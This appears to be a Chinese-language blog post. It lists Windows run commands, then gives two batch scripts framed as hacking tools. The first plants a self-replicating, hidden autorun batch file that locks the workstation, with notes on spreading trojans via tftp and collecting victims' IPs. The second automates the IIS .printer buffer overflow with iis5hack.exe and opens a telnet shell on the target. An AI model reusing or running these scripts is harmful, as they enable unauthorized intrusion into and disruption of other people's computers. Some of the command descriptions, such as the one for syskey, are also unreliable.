Windows CMD collections:
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
control.exe--------控制面板
write----------写字板
notepad--------打开记事本
mspaint--------画图板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查directx信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------dvd播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------sql server 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略
=====================================================================
Here are some collected shell command line scripts:
1.
此批处理用处:
可以锁定计算机防止黑客远程控制
黑客无法解除锁定,即使知道了密码
许多关于此批处理的想法,现在简要说几点
1.用tftp来传木马
2.将中了此批处理的的IP都发到一个地方(此想法以解决)
以下是代码:
@echo off
echo rundll32.exe user32.dll,LockWorkStation>>wm.bat
echo for %%%f in (*.bat) do wm.bat %%%f in (*.bat) do wm.bat %%%f in (*.bat) do wm.bat %%%f>>wm.bat
echo Windows Registry Editor Version 5.00 > wm.reg
echo.>> wm.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] >> wm.reg
echo.>> wm.reg
echo "wmbat"="d://wm.bat" >>wm.reg
regedit /s wm.reg
copy wm.bat d:/
attrib d:/wm.bat +h +r +s
attrib wm.bat +h +r +s
attrib wm.reg +h +r +s
wm.bat
XPSP2测试成功
==================================================================
2.
利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为:
iis5hack <目标ip> <目标端口> <目标版本> <溢出连接端口>
目标版本为0-9这10个数字,分别对应不同语言版本和sp的系统版本,我们编制的批处理使用的命令格式为:
iis.bat 目标ip [开始版本号]
开始版本号可有可无。程序如下。
@echo off
if "%1"=="" goto help
if not EXIST iis5hack.exe goto file
ping %1 -n 1 | find "Received = 1"
if errorlevel 1 goto error
rem 如果指定的系统值不合法, 则默认从9开始
if "%~2"=="" set beginSys=9 & goto ScanSys
if %~2 LSS 9 if %~2 GEQ 0 set beginSys=%~2 & goto ScanSys
set beginSys=9
:ScanSys
rem 开始溢出目标端口80 系统代码9,8,7,...,0 溢出连接端口88
rem 在执行结果中查找字符串“good”(溢出成功后才会有字符串good)
rem 如果没有错误代码1(溢出成功)就执行telnet段的内容。
for /L %%a in (%beginSys%, -1, 0) do (
iis5hack %1 80 %%a 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系统类型 %%a 失败!
)
goto error
:telnet
telnet %1 88
goto exit
:error
echo 可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次!
echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口]
ECHO 中文: 0
ECHO 中文+sp1: 1
ECHO 英文: 2
ECHO 英文+sp1: 3
ECHO 日语: 4
ECHO 日语+sp1: 5
ECHO 韩文: 6
ECHO 韩文+sp1: 7
ECHO 墨西哥语: 8
ECHO 墨西哥语+sp1: 9
goto exit
:file
echo 文件iis5hack.exe没有发现!程序终止运行!
goto exit
:help
echo 本程序用法如下:
echo iis [目标ip]
echo iis [目标ip] [开始的号码9-0]
:exit
--------------------- --------------------------------------------------------------------------------------
No comments:
Post a Comment